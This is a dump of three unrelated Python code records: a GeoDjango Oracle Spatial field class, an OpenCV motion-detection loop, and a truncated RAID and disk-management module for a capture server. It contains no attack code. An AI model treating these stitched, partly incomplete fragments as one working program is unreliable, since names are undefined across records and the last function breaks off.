class OracleSpatialField(Field):
    """
    The backend-specific geographic field for Oracle Spatial.
    """
    empty_strings_allowed = False
    def __init__(self, extent=(-180.0, -90.0, 180.0, 90.0), tolerance=0.05, **kwargs):
        """
        Oracle Spatial backend needs to have the extent -- for projected coordinate
        systems _you must define the extent manually_, since the coordinates are
        for geodetic systems. The `tolerance` keyword specifies the tolerance
        for error (in meters), and defaults to 0.05 (5 centimeters).
        """
        # Oracle Spatial specific keyword arguments.
        self._extent = extent
        self._tolerance = tolerance
        # Calling the Django field initialization.
        super(OracleSpatialField, self).__init__(**kwargs)
    def _add_geom(self, style, db_table):
        """
        Adds this geometry column into the Oracle USER_SDO_GEOM_METADATA
        table.
        """
        # Checking the dimensions.
        # TODO: Add support for 3D geometries.
        # NOTE(review): self._dim and self._srid are presumably set by a
        # subclass or mixin before this runs -- they are not set here.
        if self._dim != 2:
            raise Exception('3D geometries not yet supported on Oracle Spatial backend.')
        # Constructing the SQL that will be used to insert information about
        # the geometry column into the USER_GSDO_GEOM_METADATA table.
        # The DIMINFO column gets one SDO_DIM_ELEMENT per axis, each carrying
        # the lower/upper bound from self._extent and the tolerance.
        meta_sql = style.SQL_KEYWORD('INSERT INTO ') + \
                   style.SQL_TABLE('USER_SDO_GEOM_METADATA') + \
                   ' (%s, %s, %s, %s)\n  ' % tuple(map(qn, ['TABLE_NAME', 'COLUMN_NAME', 'DIMINFO', 'SRID'])) + \
                   style.SQL_KEYWORD(' VALUES ') + '(\n    ' + \
                   style.SQL_TABLE(gqn(db_table)) + ',\n    ' + \
                   style.SQL_FIELD(gqn(self.column)) + ',\n    ' + \
                   style.SQL_KEYWORD("MDSYS.SDO_DIM_ARRAY") + '(\n      ' + \
                   style.SQL_KEYWORD("MDSYS.SDO_DIM_ELEMENT") + \
                   ("('LONG', %s, %s, %s),\n      " % (self._extent[0], self._extent[2], self._tolerance)) + \
                   style.SQL_KEYWORD("MDSYS.SDO_DIM_ELEMENT") + \
                   ("('LAT', %s, %s, %s)\n    ),\n" % (self._extent[1], self._extent[3], self._tolerance)) + \
                   '    %s\n  );' % self._srid
        return meta_sql
    def _geom_index(self, style, db_table):
        "Creates an Oracle Geometry index (R-tree) for this geometry field."
        # Getting the index name, Oracle doesn't allow object
        # names > 30 characters.
        idx_name = truncate_name('%s_%s_id' % (db_table, self.column), 30)
        sql = style.SQL_KEYWORD('CREATE INDEX ') + \
              style.SQL_TABLE(qn(idx_name)) + \
              style.SQL_KEYWORD(' ON ') + \
              style.SQL_TABLE(qn(db_table)) + '(' + \
              style.SQL_FIELD(qn(self.column)) + ') ' + \
              style.SQL_KEYWORD('INDEXTYPE IS ') + \
              style.SQL_TABLE('MDSYS.SPATIAL_INDEX') + ';'
        return sql
    def post_create_sql(self, style, db_table):
        """
        Returns SQL that will be executed after the model has been
        created.
        """
        # Getting the meta geometry information.
        post_sql = self._add_geom(style, db_table)
        # Getting the geometric index for this Geometry column.
        if self._index:
            return (post_sql, self._geom_index(style, db_table))
        else:
            return (post_sql,)
    def db_type(self):
        "The Oracle geometric data type is MDSYS.SDO_GEOMETRY."
        return 'MDSYS.SDO_GEOMETRY'
    def get_placeholder(self, value):
        """
        Provides a proper substitution value for Geometries that are not in the
        SRID of the field. Specifically, this routine will substitute in the
        SDO_CS.TRANSFORM() function call.
        """
        if value is None:
            return '%s'
        elif value.srid != self._srid:
            # Adding Transform() to the SQL placeholder.
            return '%s(SDO_GEOMETRY(%%s, %s), %s)' % (TRANSFORM, value.srid, self._srid)
        else:
            return 'SDO_GEOMETRY(%%s, %s)' % self._srid
|
1689609
|
import cv2
import numpy as np
# Simple frame-differencing motion detector over a video file.
cap = cv2.VideoCapture('data/vtest.avi')
ret, frame1 = cap.read()
ret, frame2 = cap.read()
# BUG FIX: also stop when the last frame has been consumed -- previously
# frame2 became None at end-of-video and absdiff crashed.
while cap.isOpened() and ret:
    # Pixels that changed between the two consecutive frames.
    diff = cv2.absdiff(frame1, frame2)
    # BUG FIX: threshold the frame *difference*, not the raw frame --
    # the original converted frame1, which made `diff` dead code and
    # thresholded scene brightness instead of motion.
    gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
    blur = cv2.GaussianBlur(gray, (5, 5), 0)
    _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
    dilated = cv2.dilate(thresh, None, iterations=3)
    contours, _ = cv2.findContours(dilated, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    cv2.drawContours(frame1, contours, -1, (255, 0, 0), 2)
    movement = False
    for contour in contours:
        # Ignore tiny specks of noise.
        if cv2.contourArea(contour) < 10:
            continue
        movement = True
        (x, y, w, h) = cv2.boundingRect(contour)
        # BUG FIX: the box is (x, y)-(x+w, y+h); the original drew a
        # double-sized rectangle at (x+2*w, y+2*h).
        cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
    # BUG FIX: only announce movement when a large-enough contour was found
    # (the original drew the text unconditionally, once per contour).
    if movement:
        cv2.putText(frame1, "status: MOVEMENT", (10, 20), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 3)
    cv2.imshow('frame', frame1)
    frame1 = frame2
    ret, frame2 = cap.read()
    if cv2.waitKey(40) == 27:  # Esc quits.
        break
cv2.destroyAllWindows()
cap.release()
|
1689623
|
from collections import defaultdict
import fcntl
import io
import os
import re
import subprocess
import sys
import tempfile
from django.conf import settings
#from celery.utils import log as logging
import logging
log = logging.getLogger(__name__)
#log = logging.task_logger
__author__ = 'pflarr'
# Privileged helper scripts, run via sudo. SITE_ROOT is a path object
# supporting the '/' join operator.
SUDO_CMDS = settings.SITE_ROOT/'core'/'bin'/'sudo'
ADD_SPARE_CMD = SUDO_CMDS/'mdadm_add_spare.sh'
CREATE_CMD = SUDO_CMDS/'mdadm_create.sh'
CREATE_INDEX_CMD = SUDO_CMDS/'mdadm_create_index.sh'
DESTROY_CMD = SUDO_CMDS/'mdadm_destroy.sh'
STOP_CMD = SUDO_CMDS/'mdadm_stop.sh'
REMOVE_SPARE_CMD = SUDO_CMDS/'mdadm_remove_spare.sh'
MKXFS_CMD = SUDO_CMDS/'mkfs.xfs.sh'
UDEV_TRIGGER_CMD = SUDO_CMDS/'udev_trigger.sh'
JBOD_LOCATE_CMD = SUDO_CMDS/'JBOD_locate'
# blkid is called directly (through sudo), not via a wrapper script.
BLKID_CMD = '/sbin/blkid'
# /sys/block does not contain block device partitions.
BLOCK_PATH = '/sys/class/block'
# Consider disks to be of similar size if they are within this many bytes of size.
SIZE_VARIATION = 1024**3
class Device:
    """Base class for block devices discovered under /sys/class/block.

    Class-level dictionaries cache system-wide state (known devices, mount
    table, RAID membership, LVM slaves, enclosure slots); refresh() rebuilds
    them from /sys and /proc.
    """
    # Tags stored in the `type` attribute by the concrete subclasses.
    MD_TYPE = 'MD_RAID'
    DISK_TYPE = 'DISK'
    LVM_TYPE = 'LVM'
    type = None
    # All the devices that we currently know about.
    _DEVICES = {}
    # A dictionary on mount information by device.
    _MOUNT_MAP = None
    # A dictionary mapping device_name -> raid device object.
    _RAID_MAP = {}
    # Disks that host LVM devices
    _LVM_SLAVES = {}
    # Map of device_name -> (enclosure, slot)
    _ENCLOSURE_MAP = {}
    # A dictionary of each enclosures empty slots.
    _EMPTY_SLOTS = defaultdict(lambda: set())
    _SYS_BLK = '/sys/class/block'
    # The attributes to return when asked for a json representation of this Device.
    DICT_ATTRS = ['alias',
                  'dev_path',
                  'enclosure',
                  'fs',
                  'size_hr',
                  'label',
                  'locate',
                  'mountpoint',
                  'name',
                  'size',
                  'slot',
                  'state',
                  'slot_status',
                  'type',
                  'uuid']

    def __init__(self, dev):
        """:param dev: Kernel device name, e.g. 'sda' or 'md0'."""
        # The size for block devices is in 512 byte blocks
        self.size = int(self.read(self._SYS_BLK, dev, 'size')) * 512
        self.name = dev
        # Some device types have other names
        self.alias = dev

    @property
    def uuid(self):
        """The filesystem UUID reported by blkid, or None when absent."""
        # Get the filesystem's UUID using the blkid cmd.
        blkid_cmd = [settings.SUDO_PATH, BLKID_CMD, '-o', 'value', '-s', 'UUID', self.dev_path]
        blkid_proc = subprocess.Popen(blkid_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                      universal_newlines=False)
        # BUG FIX: communicate() also waits for the child; the old
        # stdout.read() never reaped it, leaving zombie processes.
        data, _ = blkid_proc.communicate()
        uuid = bytes(data.strip()).decode('utf8')
        if uuid:
            return uuid
        else:
            return None

    @property
    def dev_path(self):
        """
        :return: The /dev path to this device.
        """
        return os.path.join('/dev', self.name)

    # Short suffixes for member-disk states (used for display).
    _STATE_CODES = {'in_sync': '',
                    'spare': '(S)',
                    'faulty': '(F)'}

    @property
    def enclosure(self):
        """The enclosure in which this device resides."""
        return self._ENCLOSURE_MAP.get(self.name, {}).get('encl')

    @property
    def slot(self):
        """The enclosure slot of this device, if any."""
        return self._ENCLOSURE_MAP.get(self.name, {}).get('slot')

    @property
    def locate(self):
        """True when the slot's locate (identify) LED is lit."""
        return self._ENCLOSURE_MAP.get(self.name, {}).get('locate') == '1'

    @locate.setter
    def locate(self, value):
        _set_locate(self, value)
        # Re-read the flag from sysfs so the cache reflects reality.
        self._ENCLOSURE_MAP[self.name]['locate'] = self.read('/sys/class/enclosure',
                                                             self.enclosure, self.slot,
                                                             'locate')

    @classmethod
    def locate_clear_all(cls):
        """Turn off every locate LED on every enclosure."""
        if subprocess.call([settings.SUDO_PATH, JBOD_LOCATE_CMD, 'clear']) != 0:
            raise RuntimeError("Could not clear locate flags.")

    @property
    def state(self):
        """A list of the known conditions for the device."""
        state = []
        if self.mountpoint is not None:
            state.append('mounted')
        raid = self._RAID_MAP.get(self.name)
        if raid is not None:
            rdisk_state = raid.disks.get(self.name)
            state.append('In RAID {} ({})'.format(raid.name, rdisk_state))
        # BUG FIX: an earlier duplicate of this check used the literal
        # pattern r'{}\d+$' without ever .format()ing in the device name,
        # so it could never match; only this working check is kept.
        parts = self.list_like(self._SYS_BLK, self.name, self.name+'\d+$')
        if parts:
            state.append('partitioned')
        # Check /proc/swaps (skipping its header line) for this device.
        swaps = self.read('/proc/swaps')
        swaps = swaps.split('\n')[1:]
        for line in swaps:
            try:
                dev = line.split()[0].split('/')[-1]
            except IndexError:
                continue
            if dev == self.name:
                state.append('swap')
        if self.name in Device._LVM_SLAVES:
            state.append('lvm_slave')
        return state

    @property
    def slot_status(self):
        """The enclosure slot status string, or None when not in a slot."""
        if self.enclosure is None or self.slot is None:
            return None
        return self.read('/sys/class/enclosure', self.enclosure, self.slot, 'status')

    @property
    def raid(self):
        """The MDRaidDevice this device belongs to, or None."""
        return self._RAID_MAP.get(self.name)

    @property
    def size_hr(self):
        """
        :return: A string of the human readible size for the device.
        """
        units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB']
        unit = units.pop(0)
        size = self.size
        while units and size > 1024:
            size /= 1024.0
            unit = units.pop(0)
        return "{0:.2f} {1:s}".format(size, unit)

    @property
    def state_cs(self):
        """The state list as a single comma-separated string."""
        return ','.join(self.state)

    @property
    def mountpoint(self):
        """Where this device is mounted, or None. LVM devices may be mounted
        under their dm alias rather than their dm-N name."""
        if self.name in self._MOUNT_MAP:
            return self._MOUNT_MAP[self.name]['mountpoint']
        elif self.type == Device.LVM_TYPE and self.alias in self._MOUNT_MAP:
            return self._MOUNT_MAP[self.alias]['mountpoint']
        else:
            return None

    @property
    def fs(self):
        """The device's filesystem type, or None if unknown."""
        if self.name in self._MOUNT_MAP:
            return self._MOUNT_MAP[self.name]['fs']
        elif self.type == Device.LVM_TYPE and self.alias in self._MOUNT_MAP:
            return self._MOUNT_MAP[self.alias]['fs']
        elif os.getuid() == 0:
            # If we can't get the filesystem from the mount table, check with blkid.
            blkid_cmd = [settings.SUDO_PATH, BLKID_CMD, '-o', 'value', '-s', 'TYPE',
                         '-p', self.dev_path]
            blkid_proc = subprocess.Popen(blkid_cmd, stdout=subprocess.PIPE)
            fs = bytes(blkid_proc.stdout.read().strip()).decode('utf8')
            return fs if fs else None
        return None

    @property
    def label(self):
        """The filesystem label from blkid, or None."""
        blkid_cmd = [settings.SUDO_PATH, BLKID_CMD, '-o', 'value', '-s', 'LABEL', self.dev_path]
        blkid_proc = subprocess.Popen(blkid_cmd, stdout=subprocess.PIPE)
        label = blkid_proc.stdout.read().strip()
        label = bytes(label).decode('utf8')
        return label if label else None

    @staticmethod
    def read(*args):
        """Join *args into a path and return the stripped file contents,
        or '' when the file cannot be read."""
        try:
            file_path = os.path.join(*args)
            # BUG FIX: close the file handle instead of leaking it.
            with open(file_path, 'rb') as data_file:
                return data_file.read().strip().decode('utf8')
        except IOError:
            return ''

    @staticmethod
    def list_like(*args):
        """List directory entries matching a regex.

        All but the last arg are path components; the last arg is a regex
        that must match the whole entry name. Returns [] for missing paths.
        """
        file_path = os.path.join(*args[:-1])
        re_str = args[-1] + '$'
        fn_re = re.compile(re_str)
        if not os.path.exists(file_path):
            return []
        return [file for file in os.listdir(file_path) if fn_re.match(file) is not None]

    @classmethod
    def map_enclosures(cls):
        """
        Map the enclosures listed in sysfs, and add that info to the given devices
        :return: None
        """
        cls._ENCLOSURE_MAP = {}
        cls._EMPTY_SLOTS = defaultdict(lambda: set())
        for encl in Device.list_like('/sys/class/enclosure', r'.+'):
            for slot in Device.list_like('/sys/class/enclosure', encl, r'Slot \d+'):
                disks = Device.list_like('/sys/class/enclosure', encl, slot, 'device', 'block',
                                         r'sd\w+')
                locate = Device.read('/sys/class/enclosure', encl, slot, 'locate')
                status = Device.read('/sys/class/enclosure', encl, slot, 'status')
                for disk in disks:
                    cls._ENCLOSURE_MAP[disk] = {'encl': encl,
                                                'slot': slot,
                                                'locate': locate,
                                                'status': status}
                if not disks:
                    cls._EMPTY_SLOTS[encl].add(slot)

    def format_xfs(self, label=None):
        """Format this device with xfs.
        :param label: The label to give the filesystem, if any.
        """
        # Create xfs filesystem
        err = tempfile.TemporaryFile()
        mkfs_cmd = [settings.SUDO_PATH, MKXFS_CMD, self.dev_path]
        if label is not None:
            mkfs_cmd.append(label)
        if subprocess.call(mkfs_cmd, stdout=err, stderr=err) != 0:
            err.seek(0)
            raise RuntimeError("Error formatting device {}: {}".format(self.name, err.read()))

    # Subclasses set this to a compiled regex matching their device names.
    COMPAT_RE = None

    @classmethod
    def is_compat(cls, dev):
        """Returns true if this class is compatible with the given device."""
        return cls.COMPAT_RE.match(dev) is not None

    @classmethod
    def refresh(cls):
        """Refresh cached disk information. This only applies to mount and fs info, current."""
        devices = set(os.listdir(BLOCK_PATH))
        old_devices = set(cls._DEVICES.keys())
        # Remove any devices that are no longer present.
        for mdev in old_devices - devices:
            del cls._DEVICES[mdev]
        # Add any new devices
        for dev in devices - old_devices:
            if MDRaidDevice.is_compat(dev):
                # This is an mdadm RAID.
                cls._DEVICES[dev] = MDRaidDevice(dev)
            elif DiskDevice.is_compat(dev):
                # This is a regular serial device
                cls._DEVICES[dev] = DiskDevice(dev)
            elif LVMDevice.is_compat(dev):
                cls._DEVICES[dev] = LVMDevice(dev)
            else:
                # We only consider the above device types.
                continue
        cls.map_enclosures()
        # Make a dictionary of mounted disks -> (mount_point, filesystem).
        mounts = {}
        # BUG FIX: use a context manager so /proc/mounts is closed.
        with open('/proc/mounts') as mounts_file:
            for line in mounts_file.readlines():
                mdev, mountpoint, fs = line.split()[:3]
                mdev = mdev.split('/')[-1]
                mounts[mdev] = {'mountpoint': mountpoint, 'fs': fs}
        Device._MOUNT_MAP = mounts
        # Gather information from composite devices.
        for dev in cls._DEVICES:
            dev_ob = cls._DEVICES[dev]
            if dev_ob.type == Device.MD_TYPE:
                dev_ob.map_member_devices()
            if dev_ob.type == Device.LVM_TYPE:
                dev_ob.map_slaves()
        cls._clean_raid_map()

    @classmethod
    def _clean_raid_map(cls):
        """Remove any entries in the RAID map for which their RAID no longer exists."""
        for dev in list(cls._RAID_MAP.keys()):
            raid = cls._RAID_MAP[dev]
            if raid.name not in cls._DEVICES:
                del cls._RAID_MAP[dev]

    @classmethod
    def get_devices(cls):
        """Get a dictionary of device_name -> Device_object that includes all disk devices
        that we recognize on the system.
        :rtype: dict[str, Device]
        """
        cls.refresh()
        return cls._DEVICES

    @classmethod
    def find_device_by_uuid(cls, uuid):
        """ Find the device with the given UUID, and return a Device object (or child) for it.
        :return: The device node identified by the given uuid, or None if not found.
        """
        uuid = str(uuid)
        cls.refresh()
        # kludge 2018-01-11 neale
        # Docker doesn't run udev, we needed a more universal way to find devices
        dev_path_cmd = subprocess.Popen([BLKID_CMD, "-o", "device", "-t", "UUID=" + uuid], stdout=subprocess.PIPE)
        stdout, stderr = dev_path_cmd.communicate()
        dev_path = stdout.strip().decode('utf-8')
        if not dev_path:
            return None
        dev_name = os.path.split(dev_path)[-1]
        return cls._DEVICES.get(dev_name)

    @classmethod
    def get_empty_slots(cls):
        """Return a list of empty slot objects for each empty JBOD slot."""
        cls.refresh()
        empty_slots = []
        for encl in cls._EMPTY_SLOTS:
            for slot in cls._EMPTY_SLOTS[encl]:
                empty_slots.append(EmptySlot(encl, slot))
        return empty_slots

    def as_dict(self):
        """Return the DICT_ATTRS attributes as a dict, omitting Nones."""
        d = {}
        for attr in self.DICT_ATTRS:
            val = getattr(self, attr)
            if val is not None:
                d[attr] = val
        return d

    def __getitem__(self, index):
        # Index into DICT_ATTRS, returning the named attribute's value.
        attr = self.DICT_ATTRS[index]
        return getattr(self, attr)

    def __str__(self):
        return "{}({})".format(self.type, self.dev_path)

    # BUG FIX: this was misspelled `__repr` (single trailing underscore
    # pair missing), so it was never used as the repr hook.
    def __repr__(self):
        return str(self)
class MDRaidDevice(Device):
    """An MDADM RAID device."""
    type = Device.MD_TYPE
    # md devices are named md0, md1, ...
    COMPAT_RE = re.compile(r'md\d+$')
    # RAID devices expose extra attributes in their JSON representation.
    DICT_ATTRS = Device.DICT_ATTRS + ['degraded',
                                      'level',
                                      'count',
                                      'spares',
                                      'array_state',
                                      'rebuild_status']
    def __init__(self, dev):
        """:param dev: The md device name, e.g. 'md0'."""
        Device.__init__(self, dev)
        # sysfs 'degraded' is '0' or '1'.
        self.degraded = False if self.read(self._SYS_BLK, dev, 'md', 'degraded') == '0' else True
        # RAID level string, e.g. 'raid5'.
        self.level = self.read(self._SYS_BLK, dev, 'md', 'level')
        count = self.read(self._SYS_BLK, dev, 'md', 'raid_disks')
        self.count = int(count) if count else 0
        # member device name -> state string; filled by map_member_devices().
        self.disks = {}
        self.spares = 0
    @property
    def array_state(self):
        """Grab the state value for the array from sys."""
        return self.read('/sys/class/block', self.name, 'md', 'array_state')
    def map_member_devices(self):
        """
        Update our map of device -> RAID for those devices that are part of an
        MDADM raid.
        :return:
        """
        new_map = {}
        self.disks = {}
        self.spares = 0
        # Member disks appear as 'dev-<name>' directories under md/.
        raid_disks = self.list_like(self._SYS_BLK, self.name, 'md', 'dev-\w+')
        for disk in raid_disks:
            rdisk_state = self.read(self._SYS_BLK, self.name, 'md', disk, 'state')
            dev_name = disk.split('-', 1)[1]
            new_map[dev_name] = self
            self.disks[dev_name] = rdisk_state
            if rdisk_state == 'spare':
                self.spares += 1
        Device._RAID_MAP.update(new_map)
        # Drop stale entries that still point at this RAID but are no
        # longer members of it.
        for dev in list(Device._RAID_MAP.keys()):
            raid = Device._RAID_MAP[dev]
            if dev not in new_map and raid.name == self.name:
                del Device._RAID_MAP[dev]
    @property
    def rebuild_status(self):
        """Read through /proc/mdstat and get the RAID rebuild status, if it exists."""
        data = self.read('/proc/mdstat')
        line = ''
        lines = data.split('\n')
        # Skip ahead to the stanza that starts with our device name.
        while lines:
            line = lines.pop(0)
            if line.startswith(self.name + ' '):
                break
        if lines:
            line = lines.pop(0)
            # Scan this stanza (until the next 'md' stanza) for the
            # '[=>...]' rebuild progress line.
            while lines and not line.startswith('md'):
                line = line.strip()
                if line.startswith('['):
                    return line
                line = lines.pop(0)
        return None
class LVMDevice(Device):
    """A device-mapper (LVM) logical volume."""
    type = Device.LVM_TYPE
    # device-mapper devices are named dm-0, dm-1, ...
    COMPAT_RE = re.compile(r'dm-\d+$')
    def __init__(self, dev):
        """:param dev: The dm device name, e.g. 'dm-0'."""
        Device.__init__(self, dev)
        # LVM devices carry a human-friendly name under dm/name.
        self.alias = self.read(self._SYS_BLK, dev, 'dm', 'name')
    def map_slaves(self):
        """Refresh which backing devices (slaves) belong to this volume."""
        my_old_slaves = {dev for dev, dep in self._LVM_SLAVES.items()
                         if dep.name == self.name}
        my_slaves = {}
        for dev in self.list_like(self._SYS_BLK, self.name, 'slaves', '.*$'):
            my_slaves[dev] = self
        Device._LVM_SLAVES.update(my_slaves)
        # Drop devices that are no longer slaves of this volume.
        for dev in my_old_slaves - set(my_slaves.keys()):
            del Device._LVM_SLAVES[dev]
class DiskDevice(Device):
    """A plain physical (sd*/xvd*) or loop block device."""
    type = Device.DISK_TYPE
    COMPAT_RE = re.compile(r'(?:(?:sd|xvd)[a-z]+|loop)\d*$')
    def __init__(self, dev):
        """:param dev: The kernel device name, e.g. 'sda'."""
        Device.__init__(self, dev)
class EmptySlot:
    """This class is for representing empty slots in enclosures."""
    DICT_ATTRS = ['enclosure',
                  'slot',
                  'slot_status',
                  'locate']
    def __init__(self, enclosure, slot):
        """:param enclosure: enclosure name; :param slot: slot name within it."""
        self.enclosure = enclosure
        self.slot = slot
    # Borrow the Device helpers; they only rely on the enclosure/slot
    # attributes that this class also provides.
    read = Device.read
    slot_status = Device.slot_status
    @property
    def locate(self):
        # The 'locate' sysfs file holds '1' while the identify LED is lit.
        return self.read('/sys/class/enclosure', self.enclosure, self.slot, 'locate') == '1'
    @locate.setter
    def locate(self, value):
        _set_locate(self, value)
    as_dict = Device.as_dict
class Lockfile:
    """An advisory lock file, usable directly or as a context manager."""
    LOCK_DIR = settings.SITE_ROOT/'var/spool/lock/'
    def __init__(self, name):
        """:param name: The lock file's name within LOCK_DIR."""
        self.name = name
        self.lockfile = None
    @property
    def path(self):
        """The full path to the lock file."""
        return os.path.join(self.LOCK_DIR, self.name)
    def lock(self):
        """Take the lock, raising IOError when it is already held."""
        if not os.path.exists(self.LOCK_DIR):
            os.makedirs(self.LOCK_DIR)
        self.lockfile = open(self.path, 'w')
        # BUG FIX: fcntl.lockf() returns None on success and *raises*
        # OSError on contention -- the original `if fcntl.lockf(...)` branch
        # was dead code, so callers got a raw OSError instead of the
        # intended message (and the file handle leaked).
        try:
            fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
        except OSError:
            self.lockfile.close()
            self.lockfile = None
            raise IOError("Could not obtain disk management lock.\nExiting.")
    def unlock(self):
        """Release the lock, if held."""
        if self.lockfile:
            fcntl.flock(self.lockfile, fcntl.LOCK_UN)
            self.lockfile.close()
            self.lockfile = None
    def __enter__(self):
        self.lock()
        # Returning self lets callers write `with Lockfile(n) as lf:`.
        return self
    def __exit__(self, *args):
        self.unlock()
def _set_locate(dev, value):
    """Set or clear the enclosure 'locate' LED for the given device/slot."""
    flag = '1' if value else '0'
    with tempfile.TemporaryFile() as output:
        cmd = [settings.SUDO_PATH, JBOD_LOCATE_CMD, dev.enclosure, dev.slot, flag]
        if subprocess.call(cmd, stdout=output, stderr=output) != 0:
            output.seek(0)
            raise RuntimeError("Could not set locate flag for {}, {}: {}".format(
                dev.enclosure, dev.slot, output.read()
            ))
def _next_md(devices):
    """
    Find an available md device number to use.
    :param devices: A dictionary of device names as returned by block_devices.
    :return: An integer device number.
    """
    md_devices = [name for name, dev in devices.items() if dev.type == Device.MD_TYPE]
    # Raw string so '\d' is a regex digit class, not a (deprecated) string escape.
    md_nums = {int(re.match(r'md(\d+)', name).group(1)) for name in md_devices}
    md_num = 1
    while md_num in md_nums:
        md_num += 1
    return md_num
def make_raid5(disks, trial_run=False):
    """Make a RAID 5 array from the given set of disks.

    :param disks: Names of the disks to combine (at least four).
    :param bool trial_run: Don't actually create the raid.
    :raises RuntimeError: On bad arguments or mdadm failure.
    """
    with Lockfile('raid_lock'):
        # Get our block device information.
        bd = Device.get_devices()

        if len(disks) < 4:
            raise RuntimeError("You must specify at least four disks. {} given."
                               .format(len(disks)))

        # Only disks without a current state are eligible (a state
        # implies they are being used for some purpose).
        eligible = [dev for dev in bd.keys()
                    if len(bd[dev].state) == 0 and bd[dev].type == Device.DISK_TYPE]

        # Make sure all the disks requested are eligible to be added to the RAID.
        for disk in disks:
            if disk not in eligible:
                # BUG FIX: the message was never formatted with the disk name.
                raise RuntimeError('Disk {} not eligible for being added to a raid.'
                                   .format(disk))

        md_num = _next_md(bd)

        # Build the mdadm creation command.
        mdadm_cmd = [settings.SUDO_PATH, CREATE_CMD, '/dev/md{0:d}'.format(md_num),
                     str(len(disks)), str(5)]
        mdadm_cmd.extend(os.path.join('/dev', disk) for disk in disks)

        if trial_run:
            return

        proc = subprocess.Popen(mdadm_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        # Send a 'y' to the mdadm command in case it asks whether it should continue.
        try:
            outs, errs = proc.communicate(input=b"y\n", timeout=30)
        except subprocess.TimeoutExpired:
            # Don't leave the child process running after a timeout.
            proc.kill()
            raise RuntimeError("Command Timed Out: {}".format(mdadm_cmd))
        if proc.poll() != 0:
            raise RuntimeError("Command Failed: {}, {}".format(outs, errs))
def destroy_raid(dev_name, trial_run=False):
    """Stop the RAID identified by dev_name and wipe its member disks.

    :param str dev_name: Name of the md device to destroy.
    :param bool trial_run: Gather information but don't run the commands.
    """
    devices = Device.get_devices()
    raid = devices.get(dev_name)
    if raid is None:
        raise RuntimeError("No such device: {}.".format(dev_name))

    from apps.capture_node_api.models.capture import Disk

    # Unmount first if the RAID is currently mounted.
    if raid.mountpoint is not None:
        Disk.umount_uuid(raid.uuid)

    member_paths = [devices[name].dev_path for name in raid.disks.keys()]

    if trial_run:
        return

    if subprocess.call([settings.SUDO_PATH, STOP_CMD, raid.dev_path]) != 0:
        raise RuntimeError("Could not stop raid {}.".format(dev_name))
    if subprocess.call([settings.SUDO_PATH, DESTROY_CMD] + member_paths) != 0:
        raise RuntimeError("Could not destroy devices {}.".format(member_paths))
def init_capture_device(devices, status_file=None, trial_run=False, task=None):
    """Initialize the given device for capture. This involves:
    - Formatting the disk with XFS.
    - Registering the disk with the database.
    - Mounting the disk.
    - Preallocating BUCKET_SIZE files to fill the disk.
    - Registering those buckets with the database.
    :param devices: A list of device names; only the first entry is initialized.
    :param file status_file: A file like object where status updates should be written. Turned
        off by default.
    :param bool trial_run: Prepare the action, but don't do anything.
    :param task: A celery task for giving progress updates.
    """

    dev = devices[0]
    from apps.capture_node_api.models.capture import Disk

    with Lockfile('init_lock'):
        if status_file:
            print("Initializing {}. This may take a while.".format(dev), file=status_file)

        bd = Device.get_devices()
        if dev not in bd.keys():
            raise RuntimeError("Unknown device: {}".format(dev))
        dev_ob = bd[dev]

        if dev_ob.state:
            # If this device has a state, then it's not eligible to be a capture device.
            raise RuntimeError("Device is not eligible to be a capture because its state is {}"
                               .format(dev_ob.state))

        if task is not None:
            task.update_state(state='WORKING',
                              meta={'msg': 'Formatting device. This may take a while.',
                                    'progress': 5})

        if status_file:
            print("Formatting {} as xfs.".format(dev_ob.dev_path), file=status_file)
        if not trial_run:
            dev_ob.format_xfs()

        if task is not None:
            # (message typo "formating" fixed)
            task.update_state(state='WORKING', meta={'msg': 'Finished formatting.',
                                                     'progress': 25})

        # Make sure this disk has a UUID now.
        if not dev_ob.uuid:
            raise RuntimeError("Could not get uuid of recently formatted disk.")

        if status_file:
            print("Adding {} to database.".format(dev_ob.dev_path), file=status_file)

        # Add the disk to the capture database.
        # It's added as disabled so we don't try to use it right away.
        disk = Disk(uuid=dev_ob.uuid, mode='DISABLED', size=dev_ob.size)

        # Figure out which disk is the biggest so we can reset the usage_inc for each disk.
        # When trying to figure out which disk to use next, capture chooses the disk with
        # the lowest 'usage'. After using it, the disk's usage is increased by the usage_inc.
        # If all disks are the same size, their usage_inc's should all be about 1.
        # If they're of different sizes, the increment will be larger for the smaller disks,
        # so that those disks will be used less frequently.
        max_size = max([d.size for d in Disk.objects.all()] + [dev_ob.size])
        disk.usage_inc = max_size/disk.size

        if not trial_run:
            for d in Disk.objects.all():
                # Reset the usage_inc and usage for all disks. If we don't do this, the new
                # disk will be used exclusively until it catches up in usage to the old disks.
                # BUG FIX: each disk's increment must be based on its *own* size
                # (was 'max_size/disk.size', the new disk's size, for every disk).
                d.usage_inc = max_size/d.size
                d.usage = 0
                d.save()
            disk.save()

        if task is not None:
            # (message typo "mounted and dded device" fixed)
            task.update_state(state='WORKING',
                              meta={'msg': 'Device mounted and added to the system.',
                                    'progress': 30})

        if status_file:
            print("Mounting {} and filling it with capture slots.".format(dev_ob.dev_path),
                  file=status_file)

        # Fill our new capture disk with capture slots. This also mounts it.
        if not trial_run:
            try:
                disk.populate(task)
            except RuntimeError:
                # Roll back: unmount and remove the half-initialized disk record.
                disk.umount()
                disk.delete()
                raise

        if status_file:
            print("Finished initializing {}.".format(dev_ob.dev_path), file=status_file)
def uninitialize_device(dev, status_file=None):
    """Remove a device from capture service.

    NOTE(review): this is an unfinished stub -- it only looks the device up
    and does nothing with it.
    """
    known_devices = Device.get_devices()
    if dev not in known_devices:
        pass
def _compat_raids(dev, devices):
    """
    Find all the compatible RAID arrays for the given device.
    :param dev: The device we're comparing to.
    :param devices: The dict of device attributes from Device.get_devices()
    :return: A set of compatible raid device names.
    """
    target = devices[dev]
    raids = set()
    for candidate in devices.values():
        # Only consider actual disks (though these may not actually be disks
        # at present -- could be LUNs) that are already in an mdadm RAID.
        if candidate.type != Device.DISK_TYPE or candidate.raid is None:
            continue
